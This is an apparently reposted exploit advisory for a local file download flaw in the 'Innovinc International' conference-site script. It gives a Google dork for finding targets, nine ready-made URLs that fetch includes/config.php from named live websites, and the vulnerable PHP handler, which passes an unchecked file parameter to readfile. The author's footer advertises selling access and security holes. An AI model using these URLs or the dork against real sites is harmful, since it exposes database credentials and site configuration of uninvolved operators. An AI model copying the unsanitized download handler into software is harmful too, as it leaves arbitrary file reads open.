/***********************************************************************************
** Exploit Title: Innovinc International Script Local File Download Vulnerability
**
** Exploit Author: Milad Hacking
**
** Vendor Homepage : https://innovinc.org/
**
** Version : 1.1
**
** Google Dork : inurl:/importantdates intext:”Innovinc International”
**
** Date: 2020-02-13
**
** Tested on: Kali Linux / lceweasel
**
***********************************************************************************
** Demo :

https://wns2020.org/download.php?file=includes/config.php

https://www.ifhn-2020.org/download.php?file=includes/config.php

https://www.wccrt.com/download.php?file=includes/config.php

https://www.idf-2020.org/download.php?file=includes/config.php

https://alzheimers-dementia.org/download.php?file=includes/config.php

https://geology-earthscience.com/download.php?file=includes/config.php

https://2020cce.com/download.php?file=includes/config.php

https://arc-2020.org/download.php?file=includes/config.php

https://icmsn2020.com/download.php?file=includes/config.php

***********************************************************************************
***********************************************************************************
** Vulnerability code :

<?php
$file = $_GET[‘file’];
if (file_exists($file)) {
header(‘Content-Description: File Transfer’);
header(‘Content-Type: application/pdf’);
header(‘Content-Disposition: attachment; filename=’.$_GET[‘newFile’]);
header(‘Content-Transfer-Encoding: binary’);
header(‘Content-Length: ‘ . filesize($file));
ob_clean();
flush();
readfile($file);
exit;
}
?>

***********************************************************************************
** Special thanks to: iliya Norton – Milad Hacking – N3TC4T – Nazila Blackhat – Babak Kh4t4R
Mahdi CocAin – Mohammad Samiyi <3
***********************************************************************************
Sell Access And Security Holes
https://fullsec.org
https://telegram.me/Milad_Hacking
Https://telegram.me/TheHackings
http://instagram.com/Milad.Hacking
milad.hacking.blackhat@Gmail.com

***********************************************************************************





Source link

Write a comment:
*

Your email address will not be published.